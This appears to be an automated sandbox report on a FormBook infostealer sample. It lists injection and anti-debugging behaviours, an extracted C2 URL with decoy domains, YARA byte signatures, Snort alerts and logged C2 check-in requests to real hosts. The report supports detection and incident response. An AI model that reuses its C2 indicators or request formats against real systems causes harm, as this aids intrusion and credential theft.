Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
primosdv3.1.1.0.exe

Overview

General Information

Sample Name:primosdv3.1.1.0.exe
Analysis ID:715075
MD5:633bb3ab12d6fd7b6956aa3a93f55e9c
SHA1:f4a72da6391fcc9c623ae26de27fc80f10cf9f2b
SHA256:0b504e6f2a283de75673bbe913c5032b02cc6a92888f4dfab895f79104b11103
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Found hidden mapped module (file has been removed from disk)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
File is packed with WinRar
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • primosdv3.1.1.0.exe (PID: 5604 cmdline: C:\Users\user\Desktop\primosdv3.1.1.0.exe MD5: 633BB3AB12D6FD7B6956AA3A93F55E9C)
    • bstkiooen.exe (PID: 6112 cmdline: "C:\Users\user\AppData\Local\Temp\bstkiooen.exe" MD5: A2AF309781DF2F75DC0B57AE63B0F3A9)
      • bstkiooen.exe (PID: 3092 cmdline: "C:\Users\user\AppData\Local\Temp\bstkiooen.exe" MD5: A2AF309781DF2F75DC0B57AE63B0F3A9)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 4024 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 1244 cmdline: /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.nordenergogrup.store/sk29/"], "decoy": ["invycons.com", "txirla.com", "skygrade.site", "mydubai.website", "giftr.online", "fotothink.com", "receitaspanelacaseira.online", "theroost.dev", "hy-allure.com", "homefilmcompany.online", "qest-mall.net", "palochkiotrollov.online", "aibset-terms.com", "clecrffp.work", "entel04.online", "conveyancercentralcoast.com", "evaij.info", "meitue.shop", "rothchild.top", "detecter-un-logiciel-espion.com", "pondokvaksin.net", "ethelh.club", "ky5653.com", "harriscountywageclaim.com", "ky9239.com", "medicierge.com", "hhro.us", "uuapple.tokyo", "lakeshoreguesthouse.com", "meiguoguo.top", "bennyrivera.photography", "mysittarausa.com", "suytrin.online", "sandstormcase.us", "amzn-2135.click", "galaxycrime.shop", "cabinetis.com", "rapidsketch.live", "nickhouston.com", "kinksandlocs.africa", "perinatolog.xyz", "soluofcr.com", "ethpow.domains", "cardinalchats.cloud", "macaront.info", "createorcollect.com", "csjkmcwl.work", "foxrightnow.site", "teazyy.com", "assafoetida-rife.biz", "surprisee.fun", "merkur-privatbanks-de.net", "wikipediathrive.com", "vijaysriniketan.tech", "nxaey.com", "shiershi.shop", "rthesieure.com", "deloxexchange.ltd", "dropmarketsystem.com", "49715.biz", "veganmetavers.xyz", "hty268.vip", "bfuiaccw.online", "beachsyndicate.info"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\F61A.tmpJoeSecurity_FormBookYara detected FormBookJoe Security
    C:\Users\user\AppData\Local\Temp\F61A.tmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    C:\Users\user\AppData\Local\Temp\F61A.tmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    C:\Users\user\AppData\Local\Temp\F61A.tmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 37 entries
        SourceRuleDescriptionAuthorStrings
        2.2.bstkiooen.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.bstkiooen.exe.400000.1.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.bstkiooen.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.bstkiooen.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          1.2.bstkiooen.exe.1010000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 15 entries
            No Sigma rule has matched
            Timestamp:192.168.2.3103.224.212.22149708802031412 10/03/22-16:00:41.738205
            SID:2031412
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.224.212.22149708802031449 10/03/22-16:00:41.738205
            SID:2031449
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.224.212.22149708802031453 10/03/22-16:00:41.738205
            SID:2031453
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Yara matchFile source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmpAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeReversingLabs: Detection: 23%
            Source: primosdv3.1.1.0.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeJoe Sandbox ML: detected
            Source: 1.2.bstkiooen.exe.1010000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 13.2.svchost.exe.3a2f840.4.unpackAvira: Label: TR/ATRAPS.Gen5
            Source: 2.2.bstkiooen.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 2.0.bstkiooen.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 2.0.bstkiooen.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 13.2.svchost.exe.60d900.1.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nordenergogrup.store/sk29/"], "decoy": ["invycons.com", "txirla.com", "skygrade.site", "mydubai.website", "giftr.online", "fotothink.com", "receitaspanelacaseira.online", "theroost.dev", "hy-allure.com", "homefilmcompany.online", "qest-mall.net", "palochkiotrollov.online", "aibset-terms.com", "clecrffp.work", "entel04.online", "conveyancercentralcoast.com", "evaij.info", "meitue.shop", "rothchild.top", "detecter-un-logiciel-espion.com", "pondokvaksin.net", "ethelh.club", "ky5653.com", "harriscountywageclaim.com", "ky9239.com", "medicierge.com", "hhro.us", "uuapple.tokyo", "lakeshoreguesthouse.com", "meiguoguo.top", "bennyrivera.photography", "mysittarausa.com", "suytrin.online", "sandstormcase.us", "amzn-2135.click", "galaxycrime.shop", "cabinetis.com", "rapidsketch.live", "nickhouston.com", "kinksandlocs.africa", "perinatolog.xyz", "soluofcr.com", "ethpow.domains", "cardinalchats.cloud", "macaront.info", "createorcollect.com", "csjkmcwl.work", "foxrightnow.site", "teazyy.com", "assafoetida-rife.biz", "surprisee.fun", "merkur-privatbanks-de.net", "wikipediathrive.com", "vijaysriniketan.tech", "nxaey.com", "shiershi.shop", "rthesieure.com", "deloxexchange.ltd", "dropmarketsystem.com", "49715.biz", "veganmetavers.xyz", "hty268.vip", "bfuiaccw.online", "beachsyndicate.info"]}
            Source: primosdv3.1.1.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: primosdv3.1.1.0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
            Source: Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C8B348 FindFirstFileExA,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 4x nop then pop edi

            Networking

            barindex
            Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.221 80
            Source: C:\Windows\explorer.exeNetwork Connect: 5.101.152.161 80
            Source: C:\Windows\explorer.exeDomain query: www.nordenergogrup.store
            Source: C:\Windows\explorer.exeDomain query: www.sandstormcase.us
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
            Source: Malware configuration extractorURLs: www.nordenergogrup.store/sk29/
            Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
            Source: global trafficHTTP traffic detected: GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1Host: www.nordenergogrup.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1Host: www.sandstormcase.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 103.224.212.221 103.224.212.221
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 03 Oct 2022 14:00:19 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 284Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 6f 72 64 65 6e 65 72 67 6f 67 72 75 70 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.nordenergogrup.store Port 80</address></body></html>
            Source: svchost.exe, 0000000D.00000002.517398218.0000000003F1F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m
            Source: explorer.exe, 00000003.00000000.335934936.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.310782659.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.276212440.000000000F276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: unknownDNS traffic detected: queries for: www.nordenergogrup.store
            Source: global trafficHTTP traffic detected: GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1Host: www.nordenergogrup.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1Host: www.sandstormcase.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: bstkiooen.exe, 00000001.00000002.380669907.000000000109A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

            System Summary

            barindex
            Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
